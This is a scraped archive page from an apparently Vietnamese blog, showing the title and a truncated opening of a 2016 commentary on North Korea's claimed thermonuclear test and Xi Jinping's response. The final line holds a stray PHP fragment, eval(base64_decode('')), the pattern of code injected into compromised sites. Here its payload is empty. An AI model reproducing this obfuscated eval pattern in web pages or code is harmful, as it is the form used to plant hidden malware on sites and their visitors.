Archive for January 12th, 2016

Kim Jong-un thử bom nguyên tử và phản ứng của Tập Cận Bình

Kim Jong-un thử bom nguyên tử và phản ứng của Tập Cận Bình

Ngày 6 tháng Giêng 2016, phát ngôn nhân quân đội Bắc Hàn tuyên bố đã thử thành công loại bom nguyên tử nhiệt hạch (thermonuclear bomb). Thể loại chính xác của bom vẫn còn đang được các chuyên viên phân tích nhưng đa số đồng ý là bom nguyê

01.12.2016 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>